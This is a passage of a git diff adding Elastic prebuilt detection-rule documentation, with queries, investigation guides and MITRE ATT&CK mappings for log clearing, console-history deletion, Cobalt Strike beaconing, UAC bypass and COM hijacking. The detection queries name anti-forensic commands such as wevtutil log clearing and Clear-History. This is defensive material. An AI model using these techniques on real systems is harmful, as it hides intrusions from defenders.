start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "eventvwr.exe" and + not process.executable : + ("?:\\Windows\\SysWOW64\\mmc.exe", + "?:\\Windows\\System32\\mmc.exe", + "?:\\Windows\\SysWOW64\\WerFault.exe", + "?:\\Windows\\System32\\WerFault.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc new file mode 100644 index 0000000000..95555c89f4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc @@ -0,0 +1,72 @@ +[[prebuilt-rule-8-10-5-chkconfig-service-add]] +=== Chkconfig Service Add + +Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Lightning Framework +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +( + (process.executable : "/usr/sbin/chkconfig" and process.args : "--add") or + (process.args : "*chkconfig" and process.args : "--add") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ +* Sub-technique: +** Name: RC Scripts +** ID: T1037.004 +** Reference URL: https://attack.mitre.org/techniques/T1037/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc new file mode 100644 index 0000000000..ce3fa32db9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc @@ -0,0 +1,126 @@ +[[prebuilt-rule-8-10-5-clearing-windows-console-history]] +=== Clearing Windows Console History + +Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://stefanos.cloud/kb/how-to-clear-the-powershell-command-history/ +* https://www.shellhacks.com/clear-history-powershell/ +* https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Clearing Windows Console History + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of logging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the execution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. + - Verify if any other anti-forensics behaviors were observed. +- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be trying to cover up. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name == "PowerShell.EXE") and + (process.args : "*Clear-History*" or + (process.args : ("*Remove-Item*", "rm") and process.args : ("*ConsoleHost_history.txt*", "*(Get-PSReadlineOption).HistorySavePath*")) or + (process.args : "*Set-PSReadlineOption*" and process.args : "*SaveNothing*")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Command History +** ID: T1070.003 +** Reference URL: https://attack.mitre.org/techniques/T1070/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc new file mode 100644 index 0000000000..9ebbf117d6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-10-5-clearing-windows-event-logs]] +=== Clearing Windows Event Logs + +Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Clearing Windows Event Logs + +Windows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response. + +This rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. + - Verify if any other anti-forensics behaviors were observed. +- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for this action. +- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear non-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of user and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. + - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and +( + ( + (process.name : "wevtutil.exe" or process.pe.original_file_name == "wevtutil.exe") and + process.args : ("/e:false", "cl", "clear-log") + ) or + ( + process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and + process.args : "Clear-EventLog" + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Windows Event Logs +** ID: T1070.001 +** Reference URL: https://attack.mitre.org/techniques/T1070/001/ +* Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc new file mode 100644 index 0000000000..25d89cecca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc @@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon]] +=== Cobalt Strike Command and Control Beacon + +Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.morphisec.com/fin7-attacks-restaurant-industry +* https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html +* https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Threat intel + +This activity has been observed in FIN7 campaigns. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +((event.category: (network OR network_traffic) AND type: (tls OR http)) + OR event.dataset: (network_traffic.tls OR network_traffic.http) +) AND destination.domain:/[a-z]{3}.stage.[0-9]{8}\..*/ + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc new file mode 100644 index 0000000000..7d8edc9c6e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry]] +=== Code Signing Policy Modification Through Registry + +Identifies attempts to disable/modify the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Code Signing Policy Modification Through Registry + +Microsoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. + +This protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security. + +This rule identifies registry modifications that can disable DSE. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Use Osquery and endpoint driver events (`event.category = "driver"`) to investigate if suspicious drivers were loaded into the system after the registry was modified. + - !{osquery{"label":"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \"Microsoft\" AND signed == \"1\")\n"}} + - !{osquery{"label":"Osquery - Retrieve All Unsigned Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \"0\"\n"}} +- Identify the driver's `Device Name` and `Service Name`. +- Check for alerts from the rules specified in the `Related Rules` section. + +### False positive analysis + +- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk. + +### Related Rules + +- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9 +- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa +- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.) +- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed. + - This can be done via PowerShell `Remove-Service` cmdlet. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Remove and block malicious artifacts identified during triage. +- Ensure that the Driver Signature Enforcement is enabled on the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type : ("creation", "change") and +( + registry.path : "HKEY_USERS\\*\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing\\BehaviorOnFailedVerify" and + registry.value: "BehaviorOnFailedVerify" and + registry.data.strings : ("0", "0x00000000", "1", "0x00000001") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Subvert Trust Controls +** ID: T1553 +** Reference URL: https://attack.mitre.org/techniques/T1553/ +* Sub-technique: +** Name: Code Signing Policy Modification +** ID: T1553.006 +** Reference URL: https://attack.mitre.org/techniques/T1553/006/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc new file mode 100644 index 0000000000..3adc4b9a95 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc @@ -0,0 +1,103 @@ +[[prebuilt-rule-8-10-5-command-execution-via-solarwinds-process]] +=== Command Execution via SolarWinds Process + +A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html +* https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20FILEWRITES%20(METHODOLOGY).ioc + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Initial Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.name: ("cmd.exe", "powershell.exe") and +process.parent.name: ( + "ConfigurationWizard*.exe", + "NetflowDatabaseMaintenance*.exe", + "NetFlowService*.exe", + "SolarWinds.Administration*.exe", + "SolarWinds.Collector.Service*.exe", + "SolarwindsDiagnostics*.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Supply Chain Compromise +** ID: T1195 +** Reference URL: https://attack.mitre.org/techniques/T1195/ +* Sub-technique: +** Name: Compromise Software Supply Chain +** ID: T1195.002 +** Reference URL: https://attack.mitre.org/techniques/T1195/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc new file mode 100644 index 0000000000..4c769c52b0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc @@ -0,0 +1,106 @@ +[[prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32]] +=== Command Shell Activity Started via RunDLL32 + +Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Credential Access +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : ("cmd.exe", "powershell.exe") and + process.parent.name : "rundll32.exe" and process.parent.command_line != null and + /* common FPs can be added here */ + not process.parent.args : ("C:\\Windows\\System32\\SHELL32.dll,RunAsNewUser_RunDLL", + "C:\\WINDOWS\\*.tmp,zzzzInvokeManagedCustomActionOutOfProc") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc new file mode 100644 index 0000000000..8bfc5552f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc @@ -0,0 +1,177 @@ +[[prebuilt-rule-8-10-5-component-object-model-hijacking]] +=== Component Object Model Hijacking + +Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Component Object Model Hijacking + +Adversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Retrieve the file referenced in the registry and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop 